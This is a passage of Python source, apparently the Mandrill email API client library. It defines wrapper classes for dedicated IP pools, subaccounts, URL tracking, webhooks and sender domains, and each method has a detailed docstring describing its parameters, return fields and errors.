InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/delete', _params) def list_pools(self, ): """Lists your dedicated IP pools. Returns: array. the dedicated IP pools for your account, up to a maximum of 1,000:: [] (struct): information about each dedicated IP pool:: [].name (string): this pool's name [].created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format [].ips (array): the dedicated IPs in this pool:: [].ips[] (struct): information about each dedicated IP:: [].ips[].ip (string): the ip address [].ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].ips[].pool (string): the name of the pool that this dedicated IP belongs to [].ips[].domain (string): the domain name (reverse dns) of this dedicated IP [].ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured:: [].ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip [].ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid [].ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error [].ips[].warmup (struct): information about the ip's warmup status:: [].ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode [].ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format [].ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('ips/list-pools', _params) def pool_info(self, pool): """Describes a single dedicated IP pool. Args: pool (string): a pool name Returns: struct. Information about the dedicated ip pool:: name (string): this pool's name created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format ips (array): the dedicated IPs in this pool:: ips[] (struct): information about each dedicated IP:: ips[].ip (string): the ip address ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].pool (string): the name of the pool that this dedicated IP belongs to ips[].domain (string): the domain name (reverse dns) of this dedicated IP ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured:: ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error ips[].warmup (struct): information about the ip's warmup status:: ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownPoolError: The provided dedicated IP pool does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'pool': pool} return self.master.call('ips/pool-info', _params) def create_pool(self, pool): """Creates a pool and returns it. If a pool already exists with this name, no action will be performed. Args: pool (string): the name of a pool to create Returns: struct. Information about the dedicated ip pool:: name (string): this pool's name created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format ips (array): the dedicated IPs in this pool:: ips[] (struct): information about each dedicated IP:: ips[].ip (string): the ip address ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].pool (string): the name of the pool that this dedicated IP belongs to ips[].domain (string): the domain name (reverse dns) of this dedicated IP ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured:: ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error ips[].warmup (struct): information about the ip's warmup status:: ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'pool': pool} return self.master.call('ips/create-pool', _params) def delete_pool(self, pool): """Deletes a pool. A pool must be empty before you can delete it, and you cannot delete your default pool. Args: pool (string): the name of the pool to delete Returns: struct. information about the status of the pool that was deleted:: pool (string): the name of the pool deleted (boolean): whether the pool was deleted Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownPoolError: The provided dedicated IP pool does not exist. InvalidDeleteDefaultPoolError: The default pool cannot be deleted. InvalidDeleteNonEmptyPoolError: Non-empty pools cannot be deleted. Error: A general Mandrill error has occurred """ _params = {'pool': pool} return self.master.call('ips/delete-pool', _params) def check_custom_dns(self, ip, domain): """Tests whether a domain name is valid for use as the custom reverse DNS for a dedicated IP. Args: ip (string): a dedicated ip address domain (string): the domain name to test Returns: struct. validation results for the domain:: valid (string): whether the domain name has a correctly-configured A record pointing to the ip address error (string): if valid is false, this will contain details about why the domain's A record is incorrect Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownIPError: The provided dedicated IP does not exist. Error: A general Mandrill error has occurred """ _params = {'ip': ip, 'domain': domain} return self.master.call('ips/check-custom-dns', _params) def set_custom_dns(self, ip, domain): """Configures the custom DNS name for a dedicated IP. Args: ip (string): a dedicated ip address domain (string): a domain name to set as the dedicated IP's custom dns name. Returns: struct. information about the dedicated IP's new configuration:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownIPError: The provided dedicated IP does not exist. InvalidCustomDNSError: The domain name is not configured for use as the dedicated IP's custom reverse DNS. InvalidCustomDNSPendingError: A custom DNS change for this dedicated IP is currently pending. Error: A general Mandrill error has occurred """ _params = {'ip': ip, 'domain': domain} return self.master.call('ips/set-custom-dns', _params) class Internal(object): def __init__(self, master): self.master = master class Subaccounts(object): def __init__(self, master): self.master = master def list(self, q=None): """Get the list of subaccounts defined for the account, optionally filtered by a prefix Args: q (string): an optional prefix to filter the subaccounts' ids and names Returns: array. the subaccounts for the account, up to a maximum of 1,000:: [] (struct): the individual subaccount info:: [].id (string): a unique indentifier for the subaccount [].name (string): an optional display name for the subaccount [].custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation [].status (string): the current sending status of the subaccount, one of "active" or "paused" [].reputation (integer): the subaccount's current reputation on a scale from 0 to 100 [].created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format [].sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) [].sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) [].sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'q': q} return self.master.call('subaccounts/list', _params) def add(self, id, name=None, notes=None, custom_quota=None): """Add a new subaccount Args: id (string): a unique identifier for the subaccount to be used in sending calls name (string): an optional display name to further identify the subaccount notes (string): optional extra text to associate with the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation Returns: struct. the information saved about the new subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota} return self.master.call('subaccounts/add', _params) def info(self, id): """Given the ID of an existing subaccount, return the data about it Args: id (string): the unique identifier of the subaccount to query Returns: struct. the information about the subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount notes (string): optional extra text to associate with the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created sent_hourly (integer): the number of emails the subaccount has sent in the last hour hourly_quota (integer): the current hourly quota for the subaccount, either manual or reputation-based last_30_days (struct): stats for this subaccount in the last 30 days:: last_30_days.sent (integer): the number of emails sent for this subaccount in the last 30 days last_30_days.hard_bounces (integer): the number of emails hard bounced for this subaccount in the last 30 days last_30_days.soft_bounces (integer): the number of emails soft bounced for this subaccount in the last 30 days last_30_days.rejects (integer): the number of emails rejected for sending this subaccount in the last 30 days last_30_days.complaints (integer): the number of spam complaints for this subaccount in the last 30 days last_30_days.unsubs (integer): the number of unsbuscribes for this subaccount in the last 30 days last_30_days.opens (integer): the number of times emails have been opened for this subaccount in the last 30 days last_30_days.unique_opens (integer): the number of unique opens for emails sent for this subaccount in the last 30 days last_30_days.clicks (integer): the number of URLs that have been clicked for this subaccount in the last 30 days last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this subaccount in the last 30 days Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/info', _params) def update(self, id, name=None, notes=None, custom_quota=None): """Update an existing subaccount Args: id (string): the unique identifier of the subaccount to update name (string): an optional display name to further identify the subaccount notes (string): optional extra text to associate with the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation Returns: struct. the information for the updated subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota} return self.master.call('subaccounts/update', _params) def delete(self, id): """Delete an existing subaccount. Any email related to the subaccount will be saved, but stats will be removed and any future sending calls to this subaccount will fail. Args: id (string): the unique identifier of the subaccount to delete Returns: struct. the information for the deleted subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/delete', _params) def pause(self, id): """Pause a subaccount's sending. Any future emails delivered to this subaccount will be queued for a maximum of 3 days until the subaccount is resumed. Args: id (string): the unique identifier of the subaccount to pause Returns: struct. the information for the paused subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/pause', _params) def resume(self, id): """Resume a paused subaccount's sending Args: id (string): the unique identifier of the subaccount to resume Returns: struct. the information for the resumed subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/resume', _params) class Urls(object): def __init__(self, master): self.master = master def list(self, ): """Get the 100 most clicked URLs Returns: array. the 100 most clicked URLs and their stats:: [] (struct): the individual URL stats:: [].url (string): the URL to be tracked [].sent (integer): the number of emails that contained the URL [].clicks (integer): the number of times the URL has been clicked from a tracked email [].unique_clicks (integer): the number of unique emails that have generated clicks for this URL Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('urls/list', _params) def search(self, q): """Return the 100 most clicked URLs that match the search query given Args: q (string): a search query Returns: array. the 100 most clicked URLs matching the search query:: [] (struct): the URL matching the query:: [].url (string): the URL to be tracked [].sent (integer): the number of emails that contained the URL [].clicks (integer): the number of times the URL has been clicked from a tracked email [].unique_clicks (integer): the number of unique emails that have generated clicks for this URL Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'q': q} return self.master.call('urls/search', _params) def time_series(self, url): """Return the recent history (hourly stats for the last 30 days) for a url Args: url (string): an existing URL Returns: array. the array of history information:: [] (struct): the information for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent with the URL during the hour [].clicks (integer): the number of times the URL was clicked during the hour [].unique_clicks (integer): the number of unique clicks generated for emails sent with this URL during the hour Raises: UnknownUrlError: The requested URL has not been seen in a tracked link InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'url': url} return self.master.call('urls/time-series', _params) def tracking_domains(self, ): """Get the list of tracking domains set up for this account Returns: array. the tracking domains and their status:: [] (struct): the individual tracking domain:: [].domain (string): the tracking domain name [].created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format [].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format [].cname (struct): details about the domain's CNAME record:: [].cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill [].cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. [].cname.error (string): an error describing the CNAME record, or null if the record is correct [].valid_tracking (boolean): whether this domain can be used as a tracking domain for email. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('urls/tracking-domains', _params) def add_tracking_domain(self, domain): """Add a tracking domain to your account Args: domain (string): a domain name Returns: struct. information about the domain:: domain (string): the tracking domain name created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format cname (struct): details about the domain's CNAME record:: cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. cname.error (string): an error describing the CNAME record, or null if the record is correct valid_tracking (boolean): whether this domain can be used as a tracking domain for email. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('urls/add-tracking-domain', _params) def check_tracking_domain(self, domain): """Checks the CNAME settings for a tracking domain. The domain must have been added already with the add-tracking-domain call Args: domain (string): an existing tracking domain name Returns: struct. information about the tracking domain:: domain (string): the tracking domain name created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format cname (struct): details about the domain's CNAME record:: cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. cname.error (string): an error describing the CNAME record, or null if the record is correct valid_tracking (boolean): whether this domain can be used as a tracking domain for email. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownTrackingDomainError: The provided tracking domain does not exist. Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('urls/check-tracking-domain', _params) class Webhooks(object): def __init__(self, master): self.master = master def list(self, ): """Get the list of all webhooks defined on the account Returns: array. the webhooks associated with the account:: [] (struct): the individual webhook info:: [].id (integer): a unique integer indentifier for the webhook [].url (string): The URL that the event data will be posted to [].description (string): a description of the webhook [].auth_key (string): the key used to requests for this webhook [].events (array): The message events that will be posted to the hook:: [].events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) [].created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format [].batches_sent (integer): the number of event batches that have ever been sent to this webhook [].events_sent (integer): the total number of events that have ever been sent to this webhook [].last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('webhooks/list', _params) def add(self, url, description=None, events=[]): """Add a new webhook Args: url (string): the URL to POST batches of events description (string): an optional description of the webhook events (array): an optional list of events that will be posted to the webhook:: events[] (string): the individual event to listen for Returns: struct. the information saved about the new webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'url': url, 'description': description, 'events': events} return self.master.call('webhooks/add', _params) def info(self, id): """Given the ID of an existing webhook, return the data about it Args: id (integer): the unique identifier of a webhook belonging to this account Returns: struct. the information about the webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownWebhookError: The requested webhook does not exist Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('webhooks/info', _params) def update(self, id, url, description=None, events=[]): """Update an existing webhook Args: id (integer): the unique identifier of a webhook belonging to this account url (string): the URL to POST batches of events description (string): an optional description of the webhook events (array): an optional list of events that will be posted to the webhook:: events[] (string): the individual event to listen for Returns: struct. the information for the updated webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownWebhookError: The requested webhook does not exist Error: A general Mandrill error has occurred """ _params = {'id': id, 'url': url, 'description': description, 'events': events} return self.master.call('webhooks/update', _params) def delete(self, id): """Delete an existing webhook Args: id (integer): the unique identifier of a webhook belonging to this account Returns: struct. the information for the deleted webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownWebhookError: The requested webhook does not exist Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('webhooks/delete', _params) class Senders(object): def __init__(self, master): self.master = master def list(self, ): """Return the senders that have tried to use this account. Returns: array. an array of sender data, one for each sending addresses used by the account:: [] (struct): the information on each sending address in the account:: [].address (string): the sender's email address [].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the total number of messages sent by this sender [].hard_bounces (integer): the total number of hard bounces by messages by this sender [].soft_bounces (integer): the total number of soft bounces by messages by this sender [].rejects (integer): the total number of rejected messages by this sender [].complaints (integer): the total number of spam complaints received for messages by this sender [].unsubs (integer): the total number of unsubscribe requests received for messages by this sender [].opens (integer): the total number of times messages by this sender have been opened [].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked [].unique_opens (integer): the number of unique opens for emails sent for this sender [].unique_clicks (integer): the number of unique clicks for emails sent for this sender Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('senders/list', _params) def domains(self, ): """Returns the sender domains that have been added to this account. Returns: array. an array of sender domain data, one for each sending domain used by the account:: [] (struct): the information on each sending domain for the account:: [].domain (string): the sender domain name [].created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format [].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format [].spf (struct): details about the domain's SPF record:: [].spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill [].spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. [].spf.error (string): an error describing the spf record, or null if the record is correct [].dkim (struct): details about the domain's DKIM record:: [].dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill [].dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. [].dkim.error (string): an error describing the DKIM record, or null if the record is correct [].verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format [].valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('senders/domains', _params) def add_domain(self, domain): """Adds a sender domain to your account. Sender domains are added automatically as you send, but you can use this call to add them ahead of time. Args: domain (string): a domain name Returns: struct. information about the domain:: domain (string): the sender domain name created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format spf (struct): details about the domain's SPF record:: spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. spf.error (string): an error describing the spf record, or null if the record is correct dkim (struct): details about the domain's DKIM record:: dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. dkim.error (string): an error describing the DKIM record, or null if the record is correct verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('senders/add-domain', _params) def check_domain(self, domain): """Checks the SPF and DKIM settings for a domain. If you haven't already added this domain to your account, it will be added automatically. Args: domain (string): a domain name Returns: struct. information about the sender domain:: domain (string): the sender domain name created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format spf (struct): details about the domain's SPF record:: spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. spf.error (string): an error describing the spf record, or null if the record is correct dkim (struct): details about the domain's DKIM record:: dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. dkim.error (string): an error describing the DKIM record, or null if the record is correct verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill 